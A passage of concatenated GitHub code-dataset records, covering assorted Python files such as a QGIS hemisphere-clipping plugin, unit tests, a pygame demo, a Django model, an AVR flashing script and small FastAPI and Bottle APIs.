QgsPointXY(np.cos(angle) * earthRadius * 0.9999,\n np.sin(angle) * earthRadius * 0.9999)\n ) for angle in angles\n ])\n \n # Sort the projected circle coordinates from west to east\n sortIdx = np.argsort(circlePoints[:, 0])\n circlePoints = circlePoints[sortIdx, :]\n circlePoints = [[[QgsPointXY(point[0], point[1])\n for point in circlePoints]]]\n \n # Find the circle point in the orthographic projection that lies\n # on the antimeridian by linearly interpolating the angles of the\n # first and last coordinates\n startGap = 180 + circlePoints[0][0][0][0]\n endGap = 180 - circlePoints[0][0][-1][0]\n totalGap = startGap + endGap\n startCoordinates = transformSrcToTarget(circlePoints[0][0][0])\n endCoordinates = transformSrcToTarget(circlePoints[0][0][-1])\n startAngle = np.arctan2(startCoordinates[0], startCoordinates[1])\n endAngle = np.arctan2(endCoordinates[0], endCoordinates[1])\n antimeridianAngle = cmath.phase(\n endGap / totalGap * cmath.rect(1, startAngle) +\n startGap / totalGap * cmath.rect(1, endAngle))\n antimeridianPoint = transformTargetToSrc(QgsPointXY(\n np.sin(antimeridianAngle) * earthRadius * 0.9999,\n np.cos(antimeridianAngle) * earthRadius * 0.9999\n ))\n \n # Close the polygon\n circlePoints[0][0].extend(\n [QgsPointXY(180.01, latitude) for latitude in\n np.linspace(antimeridianPoint[1],\n np.sign(centerLatitude) * 90, segments // 4)] +\n [QgsPointXY(-180.01, latitude) for latitude in\n np.linspace(np.sign(centerLatitude) * 90,\n antimeridianPoint[1], segments // 4)]\n )\n \n # Create the feature and add it to the layer\n circle = QgsFeature()\n circle.setGeometry(QgsGeometry.fromMultiPolygonXY(circlePoints))\n \n pr.addFeatures([circle])\n \n result = processing.run('native:intersection', {\n 'INPUT': parameters['INPUT'],\n 'OVERLAY': clipLayer,\n 'OUTPUT': parameters['OUTPUT']\n }, is_child_algorithm=True, context=context, feedback=feedback)\n \n return {self.OUTPUT: result['OUTPUT']}\n","repo_name":"jdugge/ClipToHemisphere","sub_path":"ClipToHemisphere.py","file_name":"ClipToHemisphere.py","file_ext":"py","file_size_in_byte":11850,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"5378737026","text":"import os, sys\nsys.path.append(os.path.join(os.path.dirname(__file__), \"../..\"))\nimport unittest\nfrom design.trie import Trie\n\nclass TestTimeMap(unittest.TestCase):\n def test_1(self):\n ops = [\"Trie\",\"insert\",\"search\",\"search\",\"startsWith\",\"insert\",\"search\"]\n params = [[],[\"apple\"],[\"apple\"],[\"app\"],[\"app\"],[\"app\"],[\"app\"]]\n null, true, false = None, True, False\n expected = [null,null,true,false,true,null,true]\n func = eval(ops[0])(*params[0])\n result = [None]\n for op, param in zip(ops[1:], params[1:]):\n result.append(getattr(func, op)(*param))\n self.assertEqual(result, expected)\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"yokolet/tranquil-beach-python","sub_path":"tranquil-beach/test/design_test/test_trie.py","file_name":"test_trie.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30060928862","text":"# Search for a target string.\n# Have the user input something to search for.\n# Put this into a while loop with 'x' to end the search\n# 0 1 2\narr = [\"hat\", \"watch\", \"baseball\", \"car\", \"pen\", \"disk\", \"glasses\"]\nprint(\"Searching the list: \", arr)\ntarg=\"\"\nwhile (True):\n targ = input(\"Enter item to search or 'x' to finish: \")\n if targ == \"x\":\n break\n print(\"Searching for \" + targ)\n found = False\n i=0\n while (i -20: xp[i] = xp[i] - 1\n if mx > cx[i] and xp[i] < 20: xp[i] = xp[i] + 1\n if my < cy[i] and yp[i] > -16: yp[i] = yp[i] - 1\n if my > cy[i] and yp[i] < 16: yp[i] = yp[i] + 1\n cx[i] = cx[i] + xp[i]\n cy[i] = cy[i] + yp[i]\n pygame.draw.circle(screen, (0, 64, 192), [cx[i], cy[i]], 12)\n pygame.draw.circle(screen, (0, 128, 224), [cx[i], cy[i]], 9)\n pygame.draw.circle(screen, (192, 224, 255), [cx[i], cy[i]], 6)\n\n pygame.display.update()\n clock.tick(30)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Jpub/PythonGame_1","sub_path":"Chapter11/column11.py","file_name":"column11.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"73609830567","text":"#!/usr/bin/env python\n\nimport os\nfrom pandas import *\nimport numpy as np\nfrom multiprocessing import Process, current_process, Pool\nfrom collections import defaultdict, Counter\nimport pickle\nimport json\nfrom datetime import *\nfrom pylab import *\nfrom scipy.stats import itemfreq\nimport timeit\nimport testCases\nimport dischargingRate as dr\n\n\ndef getDataDumpForAll():\n\tall_data = dr.doInPool(132)\n\treturn all_data\n\n\ndef graphDischargeSpan():\n\tall_data = getDataDumpForAll()\n\tresult = []\n\tfor i in range(len(all_data)):\n\t\tdev = next(iter(all_data[i]))\n\t\t#if dev == '2927a38a4daa0872371e822effc1499098f5fd9b':\n\t\t#\tcontinue\n\t\tdata_ = all_data[i][dev]\n\t\tx = []\n\t\tfor each in data_.keys():\n\t\t\tslist = sorted(data_[each], key = lambda x: x[0])\n\t\t\tspan = (slist[-1][0] - slist[0][0]).total_seconds()/60\n\t\t\tdrop = slist[0][1] - slist[-1][1]\n\t\t\t#x.append(round(span,3))\n\t\t\tif (span < 5 and drop < 2) or span > 10000:\n\t\t\t\tprint(dev, '---', round(span, 2), drop)\n\t\t\t\tcontinue\n\t\t\tx.append(round(span,2))\n\t\t\t\n\t\tresult.append(x)\n\tslist = sorted(result, key=lambda x: np.mean(x))\n\tfig, ax = plt.subplots()\n\tbp = ax.boxplot(slist, sym='',whis=[25,75],patch_artist = True)\n\tfor box in bp['boxes']:\n\t\tbox.set(color='#FFFFFF', linewidth=1)\n\t\tbox.set(facecolor='#c0c0c0')\n\tfor median in bp['medians']:\n\t\tmedian.set(color='#FF0000', linewidth=3)\n\tax.tick_params(labelbottom='off')\n\tax.set_ylabel('Discharging span in minutes')\n\tax.set_xlabel('Users')\n\tfig.show()\n\ndef loadDeviceOne(dev):\n\tfilename = '/home/anudipa/Documents/Jouler_Extra/final/shortlisted/'+dev+'.p'\n\ttry:\n\t\tdDataset = pickle.load(open(filename,'rb'), encoding='bytes')\n\t\tdevice = next(iter(dDataset))\n\t\t\n\t\tprint(dDataset[dev].keys())\t\n\texcept Exception as e:\n\t\tprint('Error',e)\n","repo_name":"anudipa/usage-pattern","sub_path":"allGraphsForReport.py","file_name":"allGraphsForReport.py","file_ext":"py","file_size_in_byte":1723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18247172473","text":"from django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom model_utils.models import TimeStampedModel\n\nfrom visibility.models import VisibilityField, VisibilityManager\n\n\nclass PaymentMethod(TimeStampedModel):\n objects = VisibilityManager()\n name = models.CharField(\n max_length=255,\n verbose_name=_('field-name'),\n help_text=_('field-name-help-text'),\n )\n description = models.TextField(\n help_text=_('field-description-help-text'),\n )\n needs_account_info = models.BooleanField(\n default=False,\n help_text=_('field-payment-method-need-account-info-help-text'),\n )\n price = models.PositiveIntegerField(\n default=0,\n verbose_name=_('field-price'),\n help_text=_('field-method-price-help-text'),\n )\n weight = models.PositiveIntegerField(\n default=0,\n verbose_name=_('field-weight'),\n help_text=_('field-weight-help-text'),\n )\n visibility = VisibilityField()\n\n class Meta:\n verbose_name = _('Payment Method')\n verbose_name_plural = _('Payment Methods')\n\n def __str__(self):\n return self.name\n","repo_name":"just-paja/malickosti-v-akvarelkach","sub_path":"eshop/models/payment_method.py","file_name":"payment_method.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35743473121","text":"import h5py as h5\nimport cv2\nimport numpy as np\nfrom pathlib import Path\nfrom PIL import Image\n\ndef extract_labels(list_obj):\n ships = []\n not_ships = []\n\n for path in list_obj:\n label = int(str(path).split('/')[1][0])\n if label ==1:\n ships.append(str(path))\n else:\n not_ships.append(str(path))\n return(ships,not_ships)\n\ndef get_list_paths(path):\n path_to_images = Path(path)\n generator_paths = path_to_images.glob('*.png')\n print(\"This is a Path object\",type(path_to_images))\n print(\"This is a Generator object\", type(generator_paths))\n list_paths = list(generator_paths)\n\n return list_paths\n\n\ndef create_h5(path):\n\n list_paths = get_list_paths(path)\n total_images = len(list_paths)\n print(\"The total number of images is: \",total_images)\n\n ship,no_ship = extract_labels(list_paths)\n img_dim = cv2.imread(ship[0]).shape\n\n print(\"The dimensions of the images are: \",img_dim)\n\n dim1,dim2,dim3 = img_dim[0],img_dim[1],img_dim[2]\n h5_ship_shape = (len(ship),dim1,dim2,dim3)\n h5_no_ship_shape = (len(no_ship),dim1,dim2,dim3)\n print(\"The shape of the ship dataset is:\", h5_ship_shape)\n print(\"The shape of the no_ship dataset is:\", h5_no_ship_shape)\n with h5.File('data.hdf5', 'w') as f:\n g1 = f.create_group('ships')\n d1 = g1.create_dataset('data',h5_ship_shape)\n for i in range(0,len(ship)):\n d1[i] = cv2.imread(str(ship[i]))\n\n g2= f.create_group('no_ships')\n d2 = g2.create_dataset('data',h5_no_ship_shape)\n for i in range(0,len(no_ship)):\n d2[i] = cv2.imread(no_ship[i])\n\n print(\"The name of the ships dataset is \",d1.name)\n print(\"The name of the no_ships dataset is \",d2.name)\n f.close()\n\ndef load_dataset():\n with h5.File('data.hdf5', \"r\") as f:\n print(\"The hdf5 file acts as a big dictionary where the groups are the keys:\",f.keys())\n\n print(\"Each group has a dataset associated with it:\",f['ships'].keys(),f['no_ships'].keys())\n positive_cases = f['ships']['data'][:]\n negative_cases = f['no_ships']['data'][:]\n print(\"Images are stored as numpy arrays:\",type(positive_cases))\n print(\"The shape of the positive cases is:\",positive_cases.shape)\n print(\"The shape of the negative cases is:\",negative_cases.shape)\n print(\"Checking one element of each dataset\",d1[0].shape,d2[0].shape)\n f.close()\n\n return positive_cases, negative_cases\n\ncreate_h5('./shipsnet/')\n##load_dataset()\n","repo_name":"jjpd777/h5_utils","sub_path":"create_h5.py","file_name":"create_h5.py","file_ext":"py","file_size_in_byte":2542,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"991250249","text":"from fastapi import FastAPI\nfrom fastapi import HTTPException\n\napp = FastAPI()\n\nbad_characters = ['../', './', '/', '\\\\', ':', '*', '?', '\"', '<', '>', '|']\n\n@app.get(\"/test/document\")\nasync def test_document(document: str):\n#Send the document\n if any(char in document for char in bad_characters):\n raise HTTPException(status_code=400, detail=\"Document contains invalid characters\")\n return {\"document\": document}","repo_name":"NidhalKhalfallah/Snippets-scan","sub_path":"CWEs/Python/ChatGPT/CWE-843 Scenario 2 Python.py","file_name":"CWE-843 Scenario 2 Python.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73607833448","text":"import unittest\nimport core\nimport patterns\nimport main\n\n\nclass PatternTests(object):\n\n pclass = None\n\n def test_can_construct(self):\n self.pclass()\n \n def test_raises_error_on_early_render(self):\n p = self.pclass()\n with self.assertRaises(core.PatternStateError):\n p.render()\n\n def find_with(self,items,properties,value=None):\n if not isinstance(properties,dict):\n properties = {properties: value}\n for i in items:\n for k,v in properties.items():\n try:\n if getattr(i,k) != v: break\n except AttributeError: break\n else:\n return i\n expstr = \"[\" + \", \".join([\"%s=%s\" % tuple(map(str,p)) for p in properties.items()]) + \"]\"\n actstr = \", \".join([( \"[\" +\n \", \".join([\"%s=%s\" % (k,str(getattr(i,k,\"\"))) for k in properties.keys()]) \n + \"]\" ) for i in items ])\n self.fail(\"%s not found in items %s\" % (expstr,actstr)) \n \n def find_type(self,items,type):\n l = filter(lambda x: isinstance(x,type), items)\n if len(l) == 0:\n self.fail(\"No %ss in %s\" % (str(type),str(items)))\n return l\n\n\ndef feed_input(pattern,row,col,characters):\n for char in characters:\n pattern.test(main.CurrentChar(row,col,char,core.M_NONE))\n col += 1\n\n\n\n","repo_name":"Frimkron/Ascidia","sub_path":"tests/ptests.py","file_name":"ptests.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":102,"dataset":"github-code","pt":"53"} +{"seq_id":"34687691198","text":"import json\nimport requests\nfrom addr import *\n\n\ntext = 'Новости'\n\nlenght = {'title': 30,\n 'type': 10,\n 'id': 10,\n 'description': 2000\n }\n\nengine = movix_showcases\n\n\ndef movix_searh_request():\n r = requests.get(engine['addr'],\n headers=engine['headers'],\n params={'text': text},\n timeout=25)\n print(f'Запрос:\\n{r.request.url}\\n'.replace('\\'', '\"'))\n\n if r.status_code != 200:\n print(r.status_code, r.text, r.headers)\n return False\n else:\n # Проверяем полученный ответ на наличие результатов\n result = r.json()['data']['showcases']\n\n if not result:\n print('NO RESULTS')\n return False\n print(f\"Время выполнения запроса: {r.elapsed.total_seconds()}\")\n # print(f\"Всего результатов: {r.json()['data']['total']}\\n\")\n\n fields = [k for k, v in lenght.items() if v]\n field_format = ''\n for field in fields:\n field_format = field_format + '{:<' + str(lenght[field] + 4) + '}'\n fields_line = [str(field)[:lenght[field]] for field in fields]\n\n print(field_format.format(*fields_line))\n\n for showcase in result:\n print(f'\\n-------------------------------------------- {showcase[\"title\"]} ({showcase[\"total\"]})--------------------------------------------\\n')\n for item in showcase['items']:\n # print(item)\n if item['type'] not in ('schedule', ):\n asset = [str(item[field])[:lenght[field]] for field in fields]\n else:\n asset = [str(item['data'][field])[:lenght[field]] for field in fields]\n print(field_format.format(*asset))\n\n\nif __name__ == '__main__':\n movix_searh_request()\n","repo_name":"dmvProjects/VoiceSearch","sub_path":"movix_showcases.py","file_name":"movix_showcases.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41770851204","text":"import pickle\r\n\r\n# Load A.I. model\r\n\r\nwith open('data/ai_logistic_regression.pkl','rb') as f:\r\n model = pickle.load(f)\r\n\r\n# Set data for specific person for specific day of infection\r\n\r\nwoj = 0 # region by TERYT data code\r\npow = 0 # area by TERYT data code\r\nplec = 0 # gender ('Male': 1, 'Female': 2)\r\nwiek = 0 # age\r\nprod = 0 # vaccination ('Astra Zeneca': 1, 'Johnson&Johnson': 2, 'Moderna': 3, 'Pfizer': 4, None: 5)\r\ndaw = 0 # number of doses ('one': 1, 'full': 2, 'booster': 3, 'supplemental': 4, None: 5)\r\nodp = 0 # decreased immunity ('no': 0, 'yes': 1)\r\nyear = 0 # year\r\nmon = 0 # month\r\nday = 0 # day of the month\r\n\r\n# Results: 0-1 result and % probability\r\n\r\nprint('Result:')\r\n\r\nresult = model.predict([[woj,pow,plec,wiek,prod,daw,odp,year,mon,day]])\r\n\r\nprint(result)\r\n\r\nprint('Probability:')\r\n\r\nresult = model.predict_proba([[woj,pow,plec,wiek,prod,daw,odp,year,mon,day]])\r\n\r\nprint(result)","repo_name":"marek-strzalkowski/Poseidon-AI","sub_path":"Poseidon_AI/AI_program.py","file_name":"AI_program.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35382294886","text":"from src.BaseDataTable import BaseDataTable\nimport src.dbutils as dbutils\nimport json\nimport pandas as pd\nimport pymysql\n\n\nclass RDBDataTable(BaseDataTable):\n\n \"\"\"\n The implementation classes (XXXDataTable) for CSV database, relational, etc. with extend the\n base class and implement the abstract methods.\n \"\"\"\n\n def __init__(self, table_name, connect_info, key_columns):\n \"\"\"\n\n :param table_name: Logical name of the table.\n :param connect_info: Dictionary of parameters necessary to connect to the data.\n :param key_columns: List, in order, of the columns (fields) that comprise the primary key.\n \"\"\"\n if table_name is None or connect_info is None:\n raise ValueError(\"Invalid input.\")\n\n self._data = {\n \"table_name\": table_name,\n \"connect_info\": connect_info,\n \"key_columns\": key_columns\n }\n\n cnx = dbutils.get_connection(connect_info)\n if cnx is not None:\n self._cnx = cnx\n else:\n raise Exception(\"Could not get a connection.\")\n\n def __str__(self):\n\n result = \"RDBDataTable:\\n\"\n result += json.dumps(self._data, indent=2, default=str)\n\n row_count = self.get_row_count()\n result += \"\\nNumber of rows = \" + str(row_count)\n\n some_rows = pd.read_sql(\n \"select * from \" + self._data[\"table_name\"] + \" limit 10\",\n con=self._cnx\n )\n result += \"First 10 rows = \\n\"\n result += str(some_rows)\n\n return result\n\n def get_row_count(self):\n\n row_count = self._data.get(\"row_count\", None)\n if row_count is None:\n sql = \"select count(*) as count from \" + self._data[\"table_name\"]\n res, d = dbutils.run_q(sql, args=None, fetch=True, conn=self._cnx, commit=True)\n row_count = d[0]['count']\n self._data['\"row_count'] = row_count\n\n return row_count\n\n def find_by_template(self, template, field_list=None, limit=None, offset=None, order_by=None):\n \"\"\"\n\n :param template: A dictionary of the form { \"field1\" : value1, \"field2\": value2, ...}\n :param field_list: A list of request fields of the form, ['fielda', 'fieldb', ...]\n :param limit: Do not worry about this for now.\n :param offset: Do not worry about this for now.\n :param order_by: Do not worry about this for now.\n :return: A list containing dictionaries. A dictionary is in the list representing each record\n that matches the template. The dictionary only contains the requested fields.\n \"\"\"\n sql, args = dbutils.create_select(table_name=self._data['table_name'], template=template, fields=field_list)\n res, d = dbutils.run_q(sql, args=args, conn=self._cnx, commit=True, fetch=True)\n return d\n\n def find_by_primary_key(self, key_fields, field_list=None):\n \"\"\"\n\n :param key_fields: The list with the values for the key_columns, in order, to use to find a record.\n :param field_list: A subset of the fields of the record to return.\n :return: None, or a dictionary containing the requested fields for the record identified\n by the key.\n \"\"\"\n key_cols = self._data.get('key_columns', None)\n if key_cols is None:\n raise ValueError(\"The key to success is quite literally that...\")\n template = dict(zip(key_cols, key_fields))\n output = self.find_by_template(template=template, field_list=field_list)\n\n if output is not None and len(output) > 1:\n output = None\n print('Specified primary key refers to more than one row!')\n elif output is not None and len(output) > 0:\n output = output[0]\n else:\n output = None\n\n return output\n\n def delete_by_template(self, template):\n \"\"\"\n\n :param template: Template to determine rows to delete.\n :return: Number of rows deleted.\n \"\"\"\n sql, args = dbutils.create_select(self._data['table_name'], template=template, fields=None, is_select=False)\n res = dbutils.run_q(sql, args=args, commit=True, conn=self._cnx, fetch=False)\n return res\n\n def delete_by_key(self, key_fields):\n \"\"\"\n\n Deletes the record that matches the key.\n\n :param template: A template.\n :return: A count of the rows deleted.\n \"\"\"\n key_cols = self._data.get('key_columns', None)\n if key_cols is None:\n raise ValueError(\"The key to success is quite literally that...\")\n template = dict(zip(key_cols, key_fields))\n output = self.delete_by_template(template=template)\n\n def update_by_template(self, template, new_values):\n \"\"\"\n\n :param template: Template for rows to match.\n :param new_values: New values to set for matching fields.\n :return: Number of rows updated.\n \"\"\"\n sql, args = dbutils.create_update(self._data['table_name'], template=template, changed_cols=new_values)\n res = dbutils.run_q(sql, args=args, commit=True, conn=self._cnx, fetch=False)\n return res\n\n def update_by_key(self, key_fields, new_values):\n \"\"\"\n\n :param key_fields: List of value for the key fields.\n :param new_values: A dict of field:value to set for updated row.\n :return: Number of rows updated.\n \"\"\"\n key_cols = self._data.get('key_columns', None)\n if key_cols is None:\n raise ValueError(\"The key to success is quite literally that...\")\n template = dict(zip(key_cols, key_fields))\n output = self.update_by_template(template=template, new_values=new_values)\n\n def insert(self, new_record):\n \"\"\"\n\n :param new_record: A dictionary representing a row to add to the set of records.\n :return: None\n \"\"\"\n sql, args = dbutils.create_insert(self._data['table_name'], new_record)\n result, d = dbutils.run_q(sql, args=args, commit=True, fetch=False, conn=self._cnx)\n return result\n\n def get_rows(self):\n return self._rows\n","repo_name":"sdeka1997/COMS-W4111","sub_path":"HW_Assignments/HW1_Template/src/RDBDataTable.py","file_name":"RDBDataTable.py","file_ext":"py","file_size_in_byte":6119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20011850090","text":"import csv\r\nimport sys\r\nimport os\r\nos.system('echo Running Command...')\r\nos.system('ls -ltr')\r\n\r\ntxt_file = r\"mytxt.txt\"\r\ncsv_file = r\"mycsv.csv\"\r\n\r\nin_txt = open(txt_file, \"r\")\r\nout_csv = csv.writer(open(csv_file, 'wb'))\r\n\r\nfile_string = in_txt.read()\r\n\r\nfile_list = file_string.split('\\n')\r\n\r\nfor row in ec_file_list: \r\n out_csv.writerow(row)\r\n\r\n\t","repo_name":"pswapnareddy/Walmart_Bigdata","sub_path":"Walmart/Q6.py","file_name":"Q6.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20558676089","text":"import datetime\n\nfrom django.db.models import Sum\nfrom django.db.models.functions import TruncDay, TruncMonth, TruncYear\n\nfrom oppia.test import OppiaTestCase\n\nfrom oppia.models import Course\nfrom oppia.views.utils import generate_graph_data\nfrom summary.models import CourseDailyStats\n\n\nclass OppiaViewUtilsTest(OppiaTestCase):\n\n fixtures = ['tests/test_user.json',\n 'tests/test_oppia.json',\n 'tests/test_quiz.json',\n 'tests/test_permissions.json',\n 'tests/test_coursedailystats.json',\n 'default_badges.json',\n 'tests/test_course_permissions.json']\n\n def test_graph_data_daily(self):\n course = Course.objects.get(pk=1)\n\n start_date = datetime.datetime(2017, 1, 1)\n end_date = datetime.datetime(2017, 12, 31)\n daily_stats = CourseDailyStats.objects.filter(course=course,\n day__gte=start_date,\n day__lte=end_date) \\\n .annotate(stat_date=TruncDay('day')) \\\n .values('stat_date', 'type') \\\n .annotate(total=Sum('total'))\n result = generate_graph_data(daily_stats)\n self.assertEqual(43, len(result))\n\n def test_graph_data_monthly(self):\n course = Course.objects.get(pk=1)\n\n start_date = datetime.datetime(2017, 1, 1)\n end_date = datetime.datetime(2017, 12, 31)\n monthly_stats = CourseDailyStats.objects \\\n .filter(course=course,\n day__gte=start_date,\n day__lte=end_date) \\\n .annotate(month=TruncMonth('day'),\n year=TruncYear('day')) \\\n .values('month', 'year', 'type') \\\n .annotate(total=Sum('total')) \\\n .order_by('year', 'month')\n result = generate_graph_data(monthly_stats, True)\n self.assertEqual(10, len(result))\n","repo_name":"DigitalCampus/django-oppia","sub_path":"tests/oppia/views/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"23261187279","text":"# This script creates .bin and .hex files from a given .c file and flashes the .hex file to a Microcontroller\nimport os\n#MCU=\"atmega328p\"\nMCU=\"atmega328\" # Arduino Uno\nF_CPU=1600000 # 16MHz\nCC=\"avr-gcc\"\nOBJCOPY=\"avr-objcopy\"\nCFLAGS=f\"-std=c99 -Wall -g -Os -mmcu={MCU} -DF_CPU={F_CPU} -I.\"\nTARGET=\"main_e\"\nSRCS=\"praktikum1_e.c\"\n\n# Create .bin and .hex files\ndef create():\n os.system(f\"{CC} {CFLAGS} -o {TARGET}.bin {SRCS}\")\n os.system(f\"{OBJCOPY} -j .text -j .data -O ihex {TARGET}.bin {TARGET}.hex\")\n print(f\"{TARGET}.bin and {TARGET}.hex have been created\")\n\n# Flash .hex files to Microcontroller\ndef flash():\n os.system(f\"avrdude -p {MCU} -c arduino -U flash:w:{TARGET}.hex:i -F -P /dev/ttyS4\")\n print(f\"{TARGET}.hex has been flashed to Microcontroller ({MCU})\")\n\n# Delete .bin and .hex files\ndef clean():\n os.system(\"rm -f *.bin *.hex\")\n print(\".bin and .hex files have been deleted\")\n\ndef main():\n print(\"################## AVR Flash Script ##################\")\n print(\"#\")\n print(\"# Choose between the following actions; create, flash or clean\")\n print(\"#\")\n print(\"# 1 - Create: Creates .bin and .hex files\")\n print(\"# 2 - Flash: Flashes .hex files to Microcontroller\")\n print(\"# 3 - Clean: Deletes .bin and .hex files from current directory\")\n result = input(\"# Input: \")\n if result == \"1\":\n create()\n elif result == \"2\":\n flash()\n elif result == \"3\":\n clean()\n else:\n print(\"Invalid input, please choose between 1, 2 or 3\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"mjebalidev/micro_v1","sub_path":"avr_flash.py","file_name":"avr_flash.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15334776720","text":"#-*- coding:utf-8 -*-\nimport urllib\nfrom urllib import request\nfrom lxml import etree\n\nclass teba(object):\n def __init__(self):\n self.name=\"python\"\n self.begin=1\n self.end=3\n self.url=\"http://tieba.baidu.com/f?\"\n self.headers={\"User-Agent\" : \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1 Trident/5.0;\"}\n self.fileName=1\n\n def teba1(self):\n for page in range(self.begin,self.end):\n pn=(page-1)*50\n wo={'pn':pn,'kw':self.name}\n word=urllib.parse.urlencode(wo)\n myurl=self.url+word\n self.teba2(myurl)\n\n def teba2(self,myurl):\n req=request.Request(myurl,headers=self.headers)\n response=request.urlopen(req).read()\n html=etree.HTML(response)\n data=html.xpath('//div[@class=\"threadlist_lz clearfix\"]/div/a/@href')\n for da in data:\n da=\"http://tieba.baidu.com\"+da\n self.teba3(da)\n def teba3(self,da):\n req=request.Request(da,headers=self.headers)\n response=request.urlopen(req).read()\n html=etree.HTML(response)\n data=html.xpath('//img[@class=\"BDE_Image\"]/@src')\n for dat in data:\n self.teba4(dat)\n\n def teba4(self,dat):\n print(\"曼哥非诚勿扰:正在保存 图片第:\",self.fileName,\"....张\")\n response = request.urlopen(dat).read()\n file=open(r\"C:\\Users\\黎曼\\Desktop\\贴吧图片\\\\\"+str(self.fileName)+\".jpg\",\"wb\")\n file.write(response)\n file.close()\n self.fileName=self.fileName+1\n\n\n\n\nif __name__=='__main__':\n myteba=teba()\n myteba.teba1()\n\n","repo_name":"LMlmptm/python","sub_path":"我要自学网/百度贴吧3.py","file_name":"百度贴吧3.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5045532056","text":"from fastapi import FastAPI\nimport uvicorn\napp = FastAPI()\n\n@app.get(\"/\", tags=[\"Root\"])\nasync def read_root():\n return { \n \"message\": \"Welcome to my notes application, use the /docs route to proceed\"\n }\n \n \n\nif __name__ == \"__main__\":\n uvicorn.run(\"server.api:app\", host=\"0.0.0.0\", port=8000, reload=True)","repo_name":"rangel3l2/tecnoif","sub_path":"server/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"35229521","text":"\"\"\"module containing API codebase\"\"\"\n\nimport logging\nimport json\nfrom typing import Union\n\nimport zipcodes\nfrom bottle import Bottle, abort, request, response\nfrom pydantic import ValidationError\n\nfrom config import LISTEN_ADDRESS, LISTEN_PORT, COUNTY_MAPPINGS\nfrom models import ValidationRequest\nfrom validation import validate_numbers\n\nLOGGER = logging.getLogger(__name__)\n\nAPP = Bottle()\n\n@APP.route('/validate', method='POST')\ndef validate():\n \"\"\"API route used to validate a collection of\n phone numbers\"\"\"\n\n LOGGER.debug('received request to validate phone numbers')\n # return 400 error if no request body is given\n if not request.json:\n LOGGER.error('received invalid JSON request')\n abort(400, 'invalid request body')\n\n # parse request body from JSON and convert to pydantic model\n try:\n body = ValidationRequest(**dict(request.json))\n except ValidationError:\n LOGGER.exception('unable to validate request body')\n abort(400, 'invalid request body')\n\n # validate phone numbers using python library\n valid, invalid = validate_numbers(body.numbers, body.country_code)\n LOGGER.debug('returning valid numbers %s', valid)\n return {'http_code': 200, 'data': {'valid': valid, 'invalid': invalid}}\n\ndef get_economic_region(county: str) -> Union[dict, None]:\n \"\"\"Function used to extract economic region\n from mappings based on county\"\"\"\n\n # remove 'county' word from county\n county = county.lower().replace(' county', '')\n LOGGER.debug('fetching council mapping for county %s', county)\n return COUNTY_MAPPINGS.get(county, None)\n\n@APP.route('/zipcode/', method=['GET'])\ndef zipcode(code: str):\n \"\"\"API Route to return data about zip codes\"\"\"\n\n try:\n LOGGER.debug('received request to analyze zip code %s', code)\n if not zipcodes.is_real(code):\n LOGGER.error('received invalid zip code \\'%s\\'', code)\n abort(400, 'invalid zip code')\n\n # get zip code data from database\n data = zipcodes.matching(code)\n if not data:\n LOGGER.warning('cannot find data for zipcode %s', code)\n abort(400, 'invalid zip code')\n\n if len(data) > 1:\n LOGGER.warning('found multiple data entries for single zip code')\n abort(422, 'multiple entries found for given zip code')\n data = data[0]\n\n # extract county and retrieve council mapping if exists\n economic_region = get_economic_region(data.get('county', ''))\n if economic_region is not None:\n data['economic_region'] = economic_region.title()\n return {'http_code': 200, 'data': data}\n\n except (ValueError, TypeError):\n LOGGER.exception('unable to parse zipcode')\n abort(400, 'invalid zip code')\n\n\nif __name__ == '__main__':\n\n def error_handler(error_details: str) -> dict:\n \"\"\"Custom error handler to convert errors\n to JSON Responses\"\"\"\n\n code = response.status_code\n message = response.body\n\n response.content_type = 'application/json'\n if 'Origin' in request.headers:\n response.headers['Access-Control-Allow-Origin'] = request.headers['Origin']\n else:\n response.headers['Access-Control-Allow-Origin'] = '*'\n return json.dumps({'success': False, 'http_code': code, 'message': message})\n\n APP.default_error_handler = error_handler\n APP.run(host=LISTEN_ADDRESS, port=LISTEN_PORT, 